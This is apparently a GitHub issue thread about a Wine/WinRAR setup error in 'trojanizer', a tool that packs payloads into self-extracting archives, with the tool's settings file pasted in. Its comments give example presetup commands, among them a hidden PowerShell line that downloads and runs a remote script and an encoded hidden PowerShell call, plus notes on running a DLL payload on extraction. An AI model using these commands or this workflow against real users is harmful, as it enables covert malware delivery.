r00t-3xp10it / trojanizer

Trojanize your payload - WinRAR (SFX) automatization - under Linux distros
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0065:err:mshtml:create_document_object Failed to init Gecko, returning CLASS_E_CLASSNOTAVAILABLE #4

Closed AccountCreatr closed 6 years ago

AccountCreatr commented 6 years ago


root@kali:/home/user/trojanizer# ./Trojanizer.sh [!] Checking backend applications .. [☆] wine installation : found! [x] wine Program Files -> not found! [!] Please wait: installing missing dependencies ..

[x] /root/.wine/drive_c/Program Files/WinRAR/WinRAR.exe -> not found! [☆] Please wait, trying to build required folders ..! Could not load wine-gecko. HTML rendering will be disabled. 0065:err:mshtml:create_document_object Failed to init Gecko, returning CLASS_E_CLASSNOTAVAILABLE [☆] Zenity installation : found!

Wine version

root@kali:/home/user/trojanizer# wine --version

wine-3.0 (Debian 3.0-1)

Trojanizer settings file

#                                                                            #
#    The following config file will allow you to customize settings within   #
#    venom tool, The lines that Do not have comment code ("#") are the       #
#    fields you want to toy with. There are additional options, read the     #
#    comments For additional config settings.                                #
#                                                                            #
#                                                                            #

### Local (attacker) system arch (32bit/64bit)
# This next setting forces the main tool (Trojanizer.sh) to use 'wine32'
# or 'wine64' command syntax to install dependencies or run internal commands.
# values accepted are: x64 or x86

### Replace SFX logo (image.bmp) in the created sfx archive
# Image size default is 93x302 pixels (use the same or smaller)
# values accepted are: OFF or ON

### WinRAR Presetup sfx funtion to exec program/command before extraction
# HINT: The program must allready exists on target disk. Syntax examples:
# cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://webserver/payload.ps1'))"
# cmd.exe /c powershell.exe -nop -wind hidden -Exec Bypass -noni -enc TfD3DvcHtLhiSmoT==
# cmd.exe /c msg * 'Remote Code Execution using SFX presetup setting'
# values accepted are: OFF or ON

### Single_file_execution, Lets look at the follow scenario:
# You have a dll payload to input that you need to execute upon extraction,
# but sfx archives can not execute directly dll files, This setting allow
# users to input one batch script(.bat) that its going to be used to execute
# the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive
# to extract both files and execute the script.bat (thats contains orders to execute payload.dll).
# ---
# HINT: single_file_execution switch default behavior its to compress the two files inputed by user
# but only execute one of them at extraction time (the 2º file inputed will be executed) ..
# values accepted are: OFF or ON

### Wine drive_c full install path (local)
# HINT: execute 'winecfg' to build the required folders or
# change this value to point to your wine drive_c install path
# WINE_PATH=/home/user/.wine/drive_c

### WinRAR.exe full install path (inside-wine)
# HINT: based on the local system arch used (local),
# winrar.exe migth be installed under: Program Files OR Program Files(x86)
WINRAR_PATH=/root/.wine/drive_c/Program Files/WinRAR/WinRAR.exe 
# WINRAR_PATH=/home/user/.wine/drive_c/Program Files/WinRAR/WinRAR.exe


What's wrong ?

AccountCreatr commented 6 years ago

Problem solved by recloning repo without any changing trojanizer's settings file. Just don't add new lines in settings file.